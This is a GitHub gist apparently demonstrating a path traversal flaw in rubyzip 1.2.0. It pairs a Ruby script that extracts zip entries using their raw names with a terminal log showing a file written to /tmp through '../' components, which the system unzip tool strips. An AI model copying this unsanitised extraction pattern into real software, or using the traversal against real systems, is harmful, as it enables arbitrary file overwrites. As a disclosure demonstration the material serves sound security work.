Skip to content

Instantly share code, notes, and snippets.

@ecneladis ecneladis/rubyzip_traversal.rb Secret
Last active Jan 31, 2017

Embed
What would you like to do?
require 'zip'
Zip::File.open('traversal.zip') do |zip_file|
# Handle entries one by one
zip_file.each do |entry|
# Extract to file/directory/symlink
puts "Extracting #{entry.name}"
entry.extract(entry.name)
end
end
❯ uname -rsv
Darwin 16.3.0 Darwin Kernel Version 16.3.0: Thu Nov 17 20:23:58 PST 2016; root:xnu-3789.31.2~1/RELEASE_X86_64
❯ ruby --version
ruby 2.3.3p222 (2016-11-21 revision 56859) [x86_64-darwin16]
❯ gem list | grep zip
rubyzip (1.2.0)
❯ unzip traversal.zip
Archive: traversal.zip
warning: skipped "../" path component(s) in ../../../../../../../../../../../../../../tmp/zip_attack123
inflating: tmp/zip_attack123
❯ ls -al /tmp/zip_attack123
ls: cannot access '/tmp/zip_attack123': No such file or directory
❯ ruby rubyzip_test_traversal.rb
Invalid date/time in zip entry
Extracting ../../../../../../../../../../../../../../tmp/zip_attack123
Invalid date/time in zip entry
❯ ls -al /tmp/zip_attack123
-rw-r--r-- 1 anon wheel 11 Jan 31 23:24 /tmp/zip_attack123
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.